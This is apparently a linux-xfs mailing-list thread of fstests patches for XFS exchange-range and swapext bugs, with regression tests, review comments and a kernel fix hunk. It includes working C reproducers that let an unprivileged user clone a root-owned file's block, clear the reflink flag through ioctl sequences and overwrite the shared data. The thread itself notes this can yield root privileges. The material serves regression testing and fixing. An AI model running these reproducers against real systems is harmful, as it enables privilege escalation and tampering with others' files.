+ /*
+ * ip1 = file1, ip2 = dirty. off2 == i_size(dirty) == blksz, so
+ * length = max(3*blksz - 2*blksz, blksz - blksz) = blksz
+ * and dirty's flush range [blksz, 2*blksz) is entirely past its EOF,
+ * so its page cache is never written back and i_disk_size stays 0:
+ * isize1 = 2*blksz + (0 - blksz) = blksz
+ * file1's ondisk size becomes one block while it still owns the
+ * shared block at offset blksz.
+ */
+ if (exchange(dirty, f1, 2 * blksz, blksz, 0,
+ XFS_EXCHANGE_RANGE_TO_EOF, "exchange TO_EOF"))
+ return 2;
+ show("2 EXCHANGE_RANGE TO_EOF");
+
+ /*
+ * By i_disk_size file1 is now a one-block file, so this looks like a
+ * full-contents exchange of two one-block files and
+ * xmi_can_exchange_reflink_flags() clears the flag.
+ */
+ if (exchange(f1, d2, 0, 0, blksz, 0, "exchange flag-clear"))
+ return 2;
+ show("3 EXCHANGE_RANGE");
+
+ /* in-place write to the still-shared block */
+ buf = malloc(blksz);
+ memset(buf, 'X', blksz);
+ if (pwrite(f1, buf, blksz, blksz) != (ssize_t)blksz)
+ return fprintf(stderr, "pwrite file1: %m\n"), 2;
+ fsync(f1);
+ show("4 pwrite(file1, blksz)");
+
+ posix_fadvise(peer, 0, 0, POSIX_FADV_DONTNEED);
+ if (pread(peer, after, blksz, 0) != (ssize_t)blksz)
+ return fprintf(stderr, "pread peer: %m\n"), 2;
+ printf("\npeer first byte %c -> %c %s\n", before[0], after[0],
+ memcmp(before, after, blksz) ? "PEER REWRITTEN" : "peer intact");
+ return memcmp(before, after, blksz) ? 0 : 1;
+}
diff --git a/src/xfs-exchange-to-eof.c b/src/xfs-exchange-to-eof.c
new file mode 100644
index 00000000000000..045bb3b97ae135
--- /dev/null
+++ b/src/xfs-exchange-to-eof.c
@@ -0,0 +1,168 @@
+// SPDX-License-Identifier: GPL-2.0
+
+// Trick exchange-range-to-EOF into screwing up the file size exchange
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/vfs.h>
+#include <linux/fs.h>
+#include <linux/fiemap.h>
+#include <errno.h>
+
+#ifndef FICLONERANGE
+#define FICLONERANGE _IOW(0x94, 13, struct file_clone_range)
+#endif
+
+#ifndef XFS_EXCHANGE_RANGE_TO_EOF
+struct xfs_exchange_range {
+ __s32 file1_fd;
+ __u32 pad;
+ __u64 file1_offset;
+ __u64 file2_offset;
+ __u64 length;
+ __u64 flags;
+};
+#define XFS_IOC_EXCHANGE_RANGE _IOW('X', 129, struct xfs_exchange_range)
+#define XFS_EXCHANGE_RANGE_TO_EOF (1ULL << 0)
+#endif
+
+static unsigned long blksz;
+static int peer, f1;
+
+static unsigned long long phys(int fd, unsigned long long off)
+{
+ struct { struct fiemap f; struct fiemap_extent e[1]; } q;
+
+ memset(&q, 0, sizeof q);
+ q.f.fm_start = off;
+ q.f.fm_length = blksz;
+ q.f.fm_extent_count = 1;
+ if (ioctl(fd, FS_IOC_FIEMAP, &q.f) || q.f.fm_mapped_extents < 1)
+ return 0;
+ return (q.e[0].fe_physical + (off - q.e[0].fe_logical)) / blksz;
+}
+
+static void show(const char *tag)
+{
+ struct stat st;
+ int i;
+
+ fstat(f1, &st);
+ printf("%-26s peer [%llu] file1 size %5lld [", tag, phys(peer, 0),
+ (long long)st.st_size);
+ for (i = 0; i < 3; i++)
+ printf("%llu%s", phys(f1, (unsigned long long)i * blksz),
+ i == 2 ? "]\n" : "] [");
+}
+
+static int mkfile(const char *name, char fill, int blocks)
+{
+ char *buf;
+ int fd;
+
+ unlink(name);
+ fd = open(name, O_RDWR | O_CREAT | O_EXCL, 0600);
+ if (fd < 0)
+ return fprintf(stderr, "open %s: %m\n", name), -1;
+ buf = malloc(blocks * blksz);
+ memset(buf, fill, blocks * blksz);
+ if (pwrite(fd, buf, blocks * blksz, 0) != (ssize_t)(blocks * blksz))
+ return fprintf(stderr, "pwrite %s: %m\n", name), -1;
+ free(buf);
+ fsync(fd);
+ return fd;
+}
+
+int main(int argc, char *argv[])
+{
+ struct xfs_exchange_range xr;
+ struct file_clone_range cr;
+ char before[65536], after[65536], *buf;
+ struct statfs sfs;
+ struct stat st;
+ int d1, d2;
+
+ if (argc != 3) {
+ fprintf(stderr, "Usage: $0 dir path_to_peer\n");
+ return 2;
+ }
+
+ if (chdir(argv[1]))
+ return perror(argv[1]), 2;
+
+ if (statfs(".", &sfs))
+ return fprintf(stderr, "statfs: %m\n"), 2;
+ blksz = sfs.f_bsize;
+ if (blksz < 512 || blksz > 65536)
+ return fprintf(stderr, "unexpected block size %lu\n", blksz), 2;
+
+ peer = open(argv[2], O_RDONLY);
+ if (peer < 0)
+ return fprintf(stderr, "open peer %s: %m\n", argv[2]), 2;
+ syncfs(peer); /* so FIEMAP reports peer's real blocks */
+ fstat(peer, &st);
+ printf("peer uid %u mode %04o size %lld, block size %lu\n\n",
+ st.st_uid, st.st_mode & 07777, (long long)st.st_size, blksz);
+ if (pread(peer, before, blksz, 0) != (ssize_t)blksz)
+ return fprintf(stderr, "read peer: %m\n"), 2;
+
+ f1 = mkfile("file1", 'A', 3);
+ d1 = mkfile("donor1", 'B', 1);
+ d2 = mkfile("donor2", 'C', 1);
+ if (f1 < 0 || d1 < 0 || d2 < 0)
+ return 2;
+ show("start");
+
+ /* 1. share peer's block into the middle of file1 */
+ cr = (struct file_clone_range){ .src_fd = peer, .src_offset = 0,
+ .src_length = blksz,
+ .dest_offset = blksz };
+ if (ioctl(f1, FICLONERANGE, &cr))
+ return fprintf(stderr, "FICLONERANGE: %m\n"), 2;
+ show("1 FICLONERANGE");
+
+ /*
+ * 2. exchange file1's last block against the whole of donor1 with
+ * TO_EOF. The sizes are exchanged too, so file1 claims one block
+ * while still owning three. file2_offset is block 2, so this exchange
+ * cannot clear a reflink flag.
+ */
+ xr = (struct xfs_exchange_range){ .file1_fd = d1, .file1_offset = 0,
+ .file2_offset = 2 * blksz,
+ .length = 0,
+ .flags = XFS_EXCHANGE_RANGE_TO_EOF };
+ if (ioctl(f1, XFS_IOC_EXCHANGE_RANGE, &xr))
+ return fprintf(stderr, "EXCHANGE_RANGE TO_EOF: %m\n"), 2;
+ show("2 EXCHANGE_RANGE TO_EOF");
+
+ /*
+ * 3. by i_disk_size this is a whole-file exchange of two one-block
+ * files, so the reflink flag is handed to donor2 and cleared off
+ * file1, which still shares a block with peer.
+ */
+ xr = (struct xfs_exchange_range){ .file1_fd = d2, .file1_offset = 0,
+ .file2_offset = 0, .length = blksz };
+ if (ioctl(f1, XFS_IOC_EXCHANGE_RANGE, &xr))
+ return fprintf(stderr, "EXCHANGE_RANGE: %m\n"), 2;
+ show("3 EXCHANGE_RANGE");
+
+ /* 4. write to the block file1 still shares with peer */
+ buf = malloc(blksz);
+ memset(buf, 'X', blksz);
+ if (pwrite(f1, buf, blksz, blksz) != (ssize_t)blksz)
+ return fprintf(stderr, "pwrite: %m\n"), 2;
+ fsync(f1);
+ show("4 pwrite(file1, 4096)");
+
+ posix_fadvise(peer, 0, 0, POSIX_FADV_DONTNEED);
+ if (pread(peer, after, blksz, 0) != (ssize_t)blksz)
+ return fprintf(stderr, "re-read peer: %m\n"), 2;
+ printf("\npeer first byte %c -> %c %s\n", before[0], after[0],
+ memcmp(before, after, blksz) ? "PEER REWRITTEN" : "peer intact");
+ return memcmp(before, after, blksz) ? 0 : 1;
+}
diff --git a/tests/generic/1958 b/tests/generic/1958
new file mode 100755
index 00000000000000..e54d2d1b9e87ed
--- /dev/null
+++ b/tests/generic/1958
@@ -0,0 +1,138 @@
+#! /bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (c) 2026 Oracle. All Rights Reserved.
+#
+# FS QA Test No. 1958
+#
+# Regression test for an exchange-range-to-EOF bug which unintentionally
+# results in files that share data blocks but don't have the reflink flag set.
+# This enables attackers to rewrite shared blocks to gain root privileges,
+# similar to refluxfs.
+. ./common/preamble
+_begin_fstest auto quick fiexchange
+
+. ./common/filter
+. ./common/reflink
+
+_require_test_program "xfs-exchange-to-eof"
+_require_test_program "xfs-exchange-to-dirty-eof"
+_require_user fsgqa
+_require_group fsgqa
+_require_scratch_reflink
+_require_xfs_io_command exchangerange
+_require_xfs_io_command bulkstat_single
+_require_cp_reflink
+
+_fixed_by_fs_commit xfs XXXXXXXXXXXXXX \
+ "xfs: fix exchange-range-to-eof file size exchange"
+
+_scratch_mkfs >> $seqres.full
+_scratch_mount
+
+rootdir=$SCRATCH_MNT/root
+userdir1=$SCRATCH_MNT/user1
+userdir2=$SCRATCH_MNT/user2
+blksz=$(_get_file_block_size $SCRATCH_MNT)
+
+# Fill $mnt/peer with "P", run reproducer program
+mkdir -p $rootdir $userdir1 $userdir2
+$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer.copy >> $seqres.full
+$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer1 >> $seqres.full
+$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer2 >> $seqres.full
+sync
+
+chown $qa_user:$qa_group $userdir1 $userdir2
+chmod +r $rootdir/peer1 $rootdir/peer2
+
+_su $qa_user -c "$here/src/xfs-exchange-to-eof $userdir1 $rootdir/peer1" &> $tmp.out1
+_su $qa_user -c "$here/src/xfs-exchange-to-dirty-eof $userdir2 $rootdir/peer2" &> $tmp.out2
+
+echo "Errors from reproducer:" >> $seqres.full
+cat $tmp.out1 >> $seqres.full
+cat $tmp.out2 >> $seqres.full
+
+# Now do an exchange where the distance between the offset and EOF are
+# different for the two files.
+l1sz=12345678 # file size for lopsided1
+l2sz=1234567 # file size for lopsided2
+
+l1rem=$((l1sz % 1048576))
+l2rem=$((l2sz % 65536))
+
+l1off=$((l1sz - l1rem)) # lopsided1 size rounded down to 1M
+l2off=$((l2sz - l2rem)) # lopsided2 size rounded down to 64k
+
+$XFS_IO_PROG -f \
+ -c "pwrite -S 0x58 0 $l1off" \
+ -c "pwrite -S 0x59 $l1off $l2rem" \
+ $rootdir/lopsided1.copy >> $seqres.full
+$XFS_IO_PROG -f \
+ -c "pwrite -S 0x59 0 $l2off" \
+ -c "pwrite -S 0x58 $l2off $l1rem" \
+ $rootdir/lopsided2.copy >> $seqres.full
+
+sync # don't flush the exchange files so that we test the pre-exchange flushing
+
+$XFS_IO_PROG -f -c "pwrite -S 0x58 0 $l1sz" $rootdir/lopsided1 >> $seqres.full
+$XFS_IO_PROG -f -c "pwrite -S 0x59 0 $l2sz" $rootdir/lopsided2 >> $seqres.full
+
+$XFS_IO_PROG -c "exchangerange -d $l1off -s $l2off -t $rootdir/lopsided2" \
+ $rootdir/lopsided1 >> $seqres.full
+
+# Now exploit the broken i_disk_size logic
+$XFS_IO_PROG -f -c "pwrite -q 0 $blksz" -c fsync $rootdir/ondisk1
+$XFS_IO_PROG -f -c "pwrite -q 0 $((3 * blksz))" \
+ -c "exchangerange -s 0 -d $((3 * blksz)) $rootdir/ondisk1" \
+ $rootdir/ondisk2
+stat -c %s $rootdir/ondisk1
+ino=$(stat -c %i $rootdir/ondisk1)
+$XFS_IO_PROG -r -c "bulkstat_single $ino" $rootdir | grep bs_size
+
+# Check for file corruption
+grep -q REWRITTEN $tmp.out1 && \
+ echo "$rootdir/peer1 rewritten, filesystem corrupt!"
+grep -q REWRITTEN $tmp.out2 && \
+ echo "$rootdir/peer2 rewritten, filesystem corrupt!"
+
+cmp -s $rootdir/peer.copy $rootdir/peer1 || \
+ echo "$rootdir/peer1 changed since its snapshot, filesystem corrupt!"
+cmp -s $rootdir/peer.copy $rootdir/peer2 || \
+ echo "$rootdir/peer2 changed since its snapshot, filesystem corrupt!"
+
+stat -c '%n:%s' $rootdir/lopsided[12] | _filter_scratch
+
+cmp -s $rootdir/lopsided1.copy $rootdir/lopsided1 || \
+ echo "$rootdir/lopsided1 is wrong, filesystem corrupt"
+cmp -s $rootdir/lopsided2.copy $rootdir/lopsided2 || \
+ echo "$rootdir/lopsided2 is wrong, filesystem corrupt"
+
+# Check reflink flags
+_scratch_unmount
+_scratch_xfs_db \
+ -c "path /user1/file1" -c 'print' \
+ -c "path /user2/file1" -c 'print' \
+ | grep v3.reflink
+_scratch_mount
+
+# Check for file corruption now that we've blown away all caches
+grep -q REWRITTEN $tmp.out1 && \
+ echo "$rootdir/peer1 rewritten, filesystem corrupt!"
+grep -q REWRITTEN $tmp.out2 && \
+ echo "$rootdir/peer2 rewritten, filesystem corrupt!"
+
+cmp -s $rootdir/peer.copy $rootdir/peer1 || \
+ echo "$rootdir/peer1 changed since its snapshot, filesystem corrupt!"
+cmp -s $rootdir/peer.copy $rootdir/peer2 || \
+ echo "$rootdir/peer2 changed since its snapshot, filesystem corrupt!"
+
+stat -c '%n:%s' $rootdir/lopsided[12] | _filter_scratch
+
+cmp -s $rootdir/lopsided1.copy $rootdir/lopsided1 || \
+ echo "$rootdir/lopsided1 is wrong, filesystem corrupt"
+cmp -s $rootdir/lopsided2.copy $rootdir/lopsided2 || \
+ echo "$rootdir/lopsided2 is wrong, filesystem corrupt"
+
+stat -c %s $rootdir/ondisk1
+$XFS_IO_PROG -r -c "bulkstat_single $ino" $rootdir | grep bs_size
+
+_exit 0
diff --git a/tests/generic/1958.out b/tests/generic/1958.out
new file mode 100644
index 00000000000000..a1f8c510e95de6
--- /dev/null
+++ b/tests/generic/1958.out
@@ -0,0 +1,11 @@
+QA output created by 1958
+0
+ bs_size = 0
+SCRATCH_MNT/root/lopsided1:11589255
+SCRATCH_MNT/root/lopsided2:1990990
+v3.reflink = 1
+v3.reflink = 1
+SCRATCH_MNT/root/lopsided1:11589255
+SCRATCH_MNT/root/lopsided2:1990990
+0
+ bs_size = 0
^ permalink raw reply related [flat|nested] 8+ messages in thread
* [PATCH] xfs: add regression test for swapext reflux
2026-10-07 17:02 [PATCH v2] xfs: fix exchange-range-to-eof file size exchange Darrick J. Wong
2026-10-07 17:04 ` [PATCH] xfs: add regression test for exchangerange-to-eof reflux Darrick J. Wong
@ 2026-10-07 17:05 ` Darrick J. Wong
2026-10-09 16:13 ` Eric Sandeen
2026-10-07 20:35 ` [PATCH v2] xfs: fix exchange-range-to-eof file size exchange Dave Chinner
2 siblings, 1 reply; 8+ messages in thread
From: Darrick J. Wong @ 2026-10-07 17:05 UTC (permalink / raw)
To: Zorro Lang; +Cc: Carlos Maiolino, Norbert Szetei, linux-xfs, Christoph Hellwig
From: Darrick J. Wong <djwong@kernel.org>
This is a regression test for a bug that Norbert Szetei reported in the
XFS swapext ioctl. I've ported his reproducer program to fstests so
that everyone can run it.
Cc: Norbert Szetei <norbert@doyensec.com>
Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
---
src/Makefile | 2
src/xfs-swapext-reflink.c | 230 +++++++++++++++++++++++++++++++++++++++++++++
tests/xfs/1939 | 69 ++++++++++++++
tests/xfs/1939.out | 2
4 files changed, 302 insertions(+), 1 deletion(-)
create mode 100644 src/xfs-swapext-reflink.c
create mode 100755 tests/xfs/1939
create mode 100644 tests/xfs/1939.out
diff --git a/src/Makefile b/src/Makefile
index 211b16a832ad5d..eaf0621fc4b876 100644
--- a/src/Makefile
+++ b/src/Makefile
@@ -37,7 +37,7 @@ LINUX_TARGETS = xfsctl bstat t_mtab getdevicesize preallo_rw_pattern_reader \
detached_mounts_propagation ext4_resize t_readdir_3 splice2pipe \
uuid_ioctl t_snapshot_deleted_subvolume fiemap-fault min_dio_alignment \
rw_hint btrfs_ioctl refluxfs xfs-exchange-to-eof \
- xfs-exchange-to-dirty-eof
+ xfs-exchange-to-dirty-eof xfs-swapext-reflink
EXTRA_EXECS = dmerror fill2attr fill2fs fill2fs_check scaleread.sh \
btrfs_crc32c_forged_name.py popdir.pl popattr.py \
diff --git a/src/xfs-swapext-reflink.c b/src/xfs-swapext-reflink.c
new file mode 100644
index 00000000000000..e2a240d5a0af91
--- /dev/null
+++ b/src/xfs-swapext-reflink.c
@@ -0,0 +1,230 @@
+// SPDX-License-Identifier: GPL-2.0
+
+// Trick swapext into screwing up the file reflink flags after data exchange
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <fcntl.h>
+#include <sys/ioctl.h>
+#include <sys/stat.h>
+#include <sys/vfs.h>
+#include <linux/fs.h>
+#include <linux/fiemap.h>
+
+#ifndef FICLONERANGE
+#define FICLONERANGE _IOW(0x94, 13, struct file_clone_range)
+#endif
+
+#ifndef XFS_EXCHANGE_RANGE_TO_EOF
+struct xfs_exchange_range {
+ __s32 file1_fd;
+ __u32 pad;
+ __u64 file1_offset;
+ __u64 file2_offset;
+ __u64 length;
+ __u64 flags;
+};
+#define XFS_IOC_EXCHANGE_RANGE _IOW('X', 129, struct xfs_exchange_range)
+#define XFS_EXCHANGE_RANGE_TO_EOF (1ULL << 0)
+#endif
+
+#ifndef XFS_IOC_SWAPEXT
+typedef struct xfs_bstime {
+ long tv_sec;
+ __s32 tv_nsec;
+} xfs_bstime_t;
+
+struct xfs_bstat {
+ __u64 bs_ino;
+ __u16 bs_mode;
+ __u16 bs_nlink;
+ __u32 bs_uid;
+ __u32 bs_gid;
+ __u32 bs_rdev;
+ __s32 bs_blksize;
+ __s64 bs_size;
+ xfs_bstime_t bs_atime;
+ xfs_bstime_t bs_mtime;
+ xfs_bstime_t bs_ctime;
+ __s64 bs_blocks;
+ __u32 bs_xflags;
+ __s32 bs_extsize;
+ __s32 bs_extents;
+ __u32 bs_gen;
+ __u16 bs_projid_lo;
+ __u16 bs_forkoff;
+ __u16 bs_projid_hi;
+ __u16 bs_sick;
+ __u16 bs_checked;
+ unsigned char bs_pad[2];
+ __u32 bs_cowextsize;
+ __u32 bs_dmevmask;
+ __u16 bs_dmstate;
+ __u16 bs_aextents;
+};
+
+struct xfs_swapext {
+ __s64 sx_version;
+#define XFS_SX_VERSION 0
+ __s64 sx_fdtarget;
+ __s64 sx_fdtmp;
+ __s64 sx_offset;
+ __s64 sx_length;
+ char sx_pad[16];
+ struct xfs_bstat sx_stat;
+};
+#define XFS_IOC_SWAPEXT _IOWR('X', 109, struct xfs_swapext)
+#endif
+
+static unsigned long blksz;
+static int peer, f1;
+
+static unsigned long long phys(int fd, unsigned long long off)
+{
+ struct { struct fiemap f; struct fiemap_extent e[1]; } q;
+
+ memset(&q, 0, sizeof q);
+ q.f.fm_start = off;
+ q.f.fm_length = blksz;
+ q.f.fm_extent_count = 1;
+ if (ioctl(fd, FS_IOC_FIEMAP, &q.f) || q.f.fm_mapped_extents < 1)
+ return 0;
+ return (q.e[0].fe_physical + (off - q.e[0].fe_logical)) / blksz;
+}
+
+static void show(const char *tag)
+{
+ struct stat st;
+ int i;
+
+ fstat(f1, &st);
+ printf("%-26s peer [%llu] file1 size %5lld [", tag, phys(peer, 0),
+ (long long)st.st_size);
+ for (i = 0; i < 3; i++)
+ printf("%llu%s", phys(f1, (unsigned long long)i * blksz),
+ i == 2 ? "]\n" : "] [");
+}
+
+static int mkfile(const char *name, char fill, int blocks)
+{
+ char *buf;
+ int fd;
+
+ unlink(name);
+ fd = open(name, O_RDWR | O_CREAT | O_EXCL, 0600);
+ if (fd < 0)
+ return fprintf(stderr, "open %s: %m\n", name), -1;
+ buf = malloc(blocks * blksz);
+ memset(buf, fill, blocks * blksz);
+ if (pwrite(fd, buf, blocks * blksz, 0) != (ssize_t)(blocks * blksz))
+ return fprintf(stderr, "pwrite %s: %m\n", name), -1;
+ free(buf);
+ fsync(fd);
+ return fd;
+}
+
+int main(int argc, char *argv[])
+{
+ struct xfs_exchange_range xr;
+ struct file_clone_range cr;
+ struct xfs_swapext sx;
+ char before[65536], after[65536], *buf;
+ struct statfs sfs;
+ struct stat st;
+ int d1, d2;
+
+ if (argc != 3) {
+ fprintf(stderr, "Usage: $0 dir path_to_peer\n");
+ return 2;
+ }
+
+ if (chdir(argv[1]))
+ return perror(argv[1]), 2;
+
+ if (statfs(".", &sfs))
+ return fprintf(stderr, "statfs: %m\n"), 2;
+ blksz = sfs.f_bsize;
+
+ peer = open(argv[2], O_RDONLY);
+ if (peer < 0)
+ return fprintf(stderr, "open peer: %m\n"), 2;
+ fstat(peer, &st);
+ printf("peer uid %u mode %04o size %lld, block size %lu\n\n",
+ st.st_uid, st.st_mode & 07777, (long long)st.st_size, blksz);
+ if (pread(peer, before, blksz, 0) != (ssize_t)blksz)
+ return fprintf(stderr, "read peer: %m\n"), 2;
+ syncfs(peer); /* so FIEMAP reports peer's real block */
+
+ f1 = mkfile("file1", 'A', 3);
+ d1 = mkfile("donor1", 'B', 1);
+ d2 = mkfile("donor2", 'C', 1);
+ if (f1 < 0 || d1 < 0 || d2 < 0)
+ return 2;
+ show("start");
+
+ /* 1. share peer's block into the middle of file1 */
+ cr = (struct file_clone_range){ .src_fd = peer, .src_offset = 0,
+ .src_length = blksz,
+ .dest_offset = blksz };
+ if (ioctl(f1, FICLONERANGE, &cr))
+ return fprintf(stderr, "FICLONERANGE: %m\n"), 2;
+ show("1 FICLONERANGE");
+
+ /*
+ * 2. exchange file1's last block against the whole of donor1 with
+ * TO_EOF. The sizes are exchanged too, so file1 claims one block
+ * while still owning three. file2_offset is block 2, so this exchange
+ * cannot clear a reflink flag.
+ */
+ xr = (struct xfs_exchange_range){ .file1_fd = d1, .file1_offset = 0,
+ .file2_offset = 2 * blksz,
+ .length = 0,
+ .flags = XFS_EXCHANGE_RANGE_TO_EOF };
+ if (ioctl(f1, XFS_IOC_EXCHANGE_RANGE, &xr))
+ return fprintf(stderr, "EXCHANGE_RANGE TO_EOF: %m\n"), 2;
+ show("2 EXCHANGE_RANGE TO_EOF");
+
+ /*
+ * 3. XFS_IOC_SWAPEXT with file1 as the target. sx_offset is 0 and
+ * sx_length equals both inodes' i_disk_size, so the "Verify all data
+ * are being swapped" test passes. xfs_swap_extent_rmap() then bounds
+ * its remap loop with XFS_B_TO_FSB(mp, i_size_read(VFS_I(ip))), which
+ * is one block, so file1's two mappings above its size are left in
+ * place -- and the reflink flags are swapped anyway, clearing file1's.
+ */
+ fsync(f1);
+ fsync(d2);
+ if (fstat(f1, &st))
+ return fprintf(stderr, "fstat file1: %m\n"), 2;
+ memset(&sx, 0, sizeof sx);
+ sx.sx_version = XFS_SX_VERSION;
+ sx.sx_fdtarget = f1;
+ sx.sx_fdtmp = d2;
+ sx.sx_offset = 0;
+ sx.sx_length = st.st_size;
+ sx.sx_stat.bs_mtime.tv_sec = st.st_mtim.tv_sec;
+ sx.sx_stat.bs_mtime.tv_nsec = st.st_mtim.tv_nsec;
+ sx.sx_stat.bs_ctime.tv_sec = st.st_ctim.tv_sec;
+ sx.sx_stat.bs_ctime.tv_nsec = st.st_ctim.tv_nsec;
+ if (ioctl(f1, XFS_IOC_SWAPEXT, &sx))
+ return fprintf(stderr, "SWAPEXT: %m\n"), 2;
+ show("3 SWAPEXT");
+
+ /* 4. write to the block file1 still shares with peer */
+ buf = malloc(blksz);
+ memset(buf, 'X', blksz);
+ if (pwrite(f1, buf, blksz, blksz) != (ssize_t)blksz)
+ return fprintf(stderr, "pwrite: %m\n"), 2;
+ fsync(f1);
+ show("4 pwrite(file1, 4096)");
+
+ posix_fadvise(peer, 0, 0, POSIX_FADV_DONTNEED);
+ if (pread(peer, after, blksz, 0) != (ssize_t)blksz)
+ return fprintf(stderr, "re-read peer: %m\n"), 2;
+ printf("\npeer first byte %c -> %c %s\n", before[0], after[0],
+ memcmp(before, after, blksz) ? "PEER REWRITTEN" : "peer intact");
+ return memcmp(before, after, blksz) ? 0 : 1;
+}
+
+
diff --git a/tests/xfs/1939 b/tests/xfs/1939
new file mode 100755
index 00000000000000..b08ea09e977628
--- /dev/null
+++ b/tests/xfs/1939
@@ -0,0 +1,69 @@
+#! /bin/bash
+# SPDX-License-Identifier: GPL-2.0
+# Copyright (c) 2026 Oracle. All Rights Reserved.
+#
+# FS QA Test No. 1939
+#
+# Regression test for an swapext bug which unintentionally results in files
+# that share data blocks but don't have the reflink flag set. This enables
+# attackers to rewrite shared blocks to gain root privileges, similar to
+# refluxfs.
+. ./common/preamble
+_begin_fstest auto quick swapext
+
+. ./common/filter
+. ./common/reflink
+
+_require_test_program "xfs-swapext-reflink"
+_require_user fsgqa
+_require_group fsgqa
+_require_scratch_reflink
+_require_xfs_scratch_rmapbt
+_require_cp_reflink
+
+_fixed_by_fs_commit xfs XXXXXXXXXXXXXX \
+ "xfs: stop exchanging reflink flags when exchanging mappings"
+
+_scratch_mkfs >> $seqres.full
+_scratch_mount
+
+rootdir=$SCRATCH_MNT/root
+userdir1=$SCRATCH_MNT/user1
+blksz=$(_get_file_block_size $SCRATCH_MNT)
+
+# Fill $mnt/peer with "P", run reproducer program
+mkdir -p $rootdir $userdir1
+$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer.copy >> $seqres.full
+$XFS_IO_PROG -f -c "pwrite -S 0x50 0 $blksz" $rootdir/peer1 >> $seqres.full
+sync
+
+chown $qa_user:$qa_group $userdir1
+chmod +r $rootdir/peer1
+
+_su $qa_user -c "$here/src/xfs-swapext-reflink $userdir1 $rootdir/peer1" &> $tmp.out1
+
+echo "Errors from reproducer:" >> $seqres.full
+cat $tmp.out1 >> $seqres.full
+
+# Check for file corruption
+grep -q REWRITTEN $tmp.out1 && \
+ echo "$rootdir/peer1 rewritten, filesystem corrupt!"
+
+cmp -s $rootdir/peer.copy $rootdir/peer1 || \
+ echo "$rootdir/peer1 changed since its snapshot, filesystem corrupt!"
+
+# Check reflink flags
+_scratch_unmount
+_scratch_xfs_db \
+ -c "path /user1/file1" -c 'print' \
+ | grep v3.reflink
+_scratch_mount
+
+# Check for file corruption now that we've blown away all caches
+grep -q REWRITTEN $tmp.out1 && \
+ echo "$rootdir/peer1 rewritten, filesystem corrupt!"
+
+cmp -s $rootdir/peer.copy $rootdir/peer1 || \
+ echo "$rootdir/peer1 changed since its snapshot, filesystem corrupt!"
+
+_exit 0
diff --git a/tests/xfs/1939.out b/tests/xfs/1939.out
new file mode 100644
index 00000000000000..ad52293f986ac6
--- /dev/null
+++ b/tests/xfs/1939.out
@@ -0,0 +1,2 @@
+QA output created by 1939
+v3.reflink = 1
^ permalink raw reply related [flat|nested] 8+ messages in thread
* Re: [PATCH v2] xfs: fix exchange-range-to-eof file size exchange
2026-10-07 17:02 [PATCH v2] xfs: fix exchange-range-to-eof file size exchange Darrick J. Wong
2026-10-07 17:04 ` [PATCH] xfs: add regression test for exchangerange-to-eof reflux Darrick J. Wong
2026-10-07 17:05 ` [PATCH] xfs: add regression test for swapext reflux Darrick J. Wong
@ 2026-10-07 20:35 ` Dave Chinner
2 siblings, 0 replies; 8+ messages in thread
From: Dave Chinner @ 2026-10-07 20:35 UTC (permalink / raw)
To: Darrick J. Wong
Cc: Carlos Maiolino, Norbert Szetei, linux-xfs, Christoph Hellwig
On Wed, Oct 07, 2026 at 10:02:27AM -0700, Darrick J. Wong wrote:
> From: Darrick J. Wong <djwong@kernel.org>
>
> Norbert Szetei posted a patch containing an incomplete description of a
> bug in XFS_IOC_EXCHANGE_RANGE's TO_EOF flag. The bug tricks
> exchange-range into modifying a file so that it has shared blocks
> starting beyond EOF, which is never allowed because files never have
> written data beyond EOF, and you can only share written data blocks.
> This is key to all the incorrect behavior that follows.
.....
> @@ -1005,10 +1006,18 @@ xfs_exchmaps_init_intent(
> return xmi;
> }
>
> + /*
> + * If the caller wanted, set each file's size to that file's exchange
> + * offset + length exchanged from the other file because the ranges in
> + * each file might be different lengths.
> + */
> if (req->flags & XFS_EXCHMAPS_SET_SIZES) {
> + loff_t off1 = XFS_FSB_TO_B(mp, xmi->xmi_startoff1);
> + loff_t off2 = XFS_FSB_TO_B(mp, xmi->xmi_startoff2);
> +
> xmi->xmi_flags |= XFS_EXCHMAPS_SET_SIZES;
> - xmi->xmi_isize1 = req->ip2->i_disk_size;
> - xmi->xmi_isize2 = req->ip1->i_disk_size;
> + xmi->xmi_isize1 = off1 + (req->ip2->i_disk_size - off2);
> + xmi->xmi_isize2 = off2 + (req->ip1->i_disk_size - off1);
> }
Yup, that comment helps :)
Rest of the fix looks good, too.
Reviewed-by: Dave Chinner <dchinner@redhat.com>
--
Dave Chinner
dgc@kernel.org
^ permalink raw reply [flat|nested] 8+ messages in thread
* Re: [PATCH] xfs: add regression test for swapext reflux
2026-10-07 17:05 ` [PATCH] xfs: add regression test for swapext reflux Darrick J. Wong
@ 2026-10-09 16:13 ` Eric Sandeen
2026-10-09 22:11 ` Darrick J. Wong
0 siblings, 1 reply; 8+ messages in thread
From: Eric Sandeen @ 2026-10-09 16:13 UTC (permalink / raw)
To: Darrick J. Wong, Zorro Lang
Cc: Carlos Maiolino, Norbert Szetei, linux-xfs, Christoph Hellwig
On 10/7/26 12:05 PM, Darrick J. Wong wrote:
> From: Darrick J. Wong <djwong@kernel.org>
>
> This is a regression test for a bug that Norbert Szetei reported in the
> XFS swapext ioctl. I've ported his reproducer program to fstests so
> that everyone can run it.
A couple things I notice -
1) this still requires EXCHRANGE?
2) if the EXCHRANGE ioctl fails with EOPNOTSUPP the test passes silently
3) su $qa_user -c "$here/src/xfs-swapext-reflink $userdir1 $rootdir/peer1"
requires $qa_user to be able to traverse to $here/src/xfs-swapext-reflink and if
it can't, the test fails oddly
For 3) I think just dropping the $here might fix it?
su $qa_user -c "./src/xfs-swapext-reflink $userdir1 $rootdir/peer1"
-Eric
> Cc: Norbert Szetei <norbert@doyensec.com>
> Signed-off-by: "Darrick J. Wong" <djwong@kernel.org>
> ---
> src/Makefile | 2
> src/xfs-swapext-reflink.c | 230 +++++++++++++++++++++++++++++++++++++++++++++
